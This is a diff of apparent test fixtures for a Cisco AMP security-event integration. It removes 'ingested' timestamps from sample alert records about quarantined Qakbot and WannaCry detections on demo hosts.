@@ -827,7 +818,6 @@ ], "code": "1090519054", "id": "6411525251028484000", - "ingested": "2022-02-02T05:53:05.376867257Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "severity": 2 
@@ -915,7 +905,6 @@ ], "code": "553648143", "id": "6411525251028484000", - "ingested": "2022-02-02T05:53:05.376868373Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 2 
@@ -991,7 +980,6 @@ ], "code": "2164260893", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376869692Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 
@@ -1067,7 +1055,6 @@ ], "code": "2164260893", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376870829Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 
@@ -1143,7 +1130,6 @@ ], "code": "2164260893", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376871917Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 
@@ -1215,7 +1201,6 @@ ], "code": "553648155", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376872988Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 
@@ -1289,7 +1274,6 @@ ], "code": "553648147", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376874034Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 
@@ -1369,7 +1353,6 @@ ], "code": "553648147", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376875147Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}", "severity": 3 
@@ -1453,7 +1436,6 @@ ], "code": "553648147", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376876227Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 
@@ -1533,7 +1515,6 @@ ], "code": "553648147", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376877299Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 
@@ -1615,7 +1596,6 @@ ], "code": "2164260893", "id": "6419264039066534000", - "ingested": "2022-02-02T05:53:05.376878267Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 3 
@@ -1687,7 +1667,6 @@ ], "code": "553648155", "id": "6419264039066534000", - "ingested": "2022-02-02T05:53:05.376879252Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 3 
@@ -1761,7 +1740,6 @@ ], "code": "553648147", "id": "6419264039066534000", - "ingested": "2022-02-02T05:53:05.376880222Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "severity": 3 
@@ -1845,7 +1823,6 @@ ], "code": "553648147", "id": "6419264039066534000", - "ingested": "2022-02-02T05:53:05.376881199Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "severity": 3 
@@ -1931,7 +1908,6 @@ ], "code": "2164260893", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376882341Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
@@ -2007,7 +1983,6 @@ ], "code": "2164260893", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376883325Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
@@ -2083,7 +2058,6 @@ ], "code": "2164260893", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376884380Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
@@ -2157,7 +2131,6 @@ ], "code": "553648147", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376885343Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective 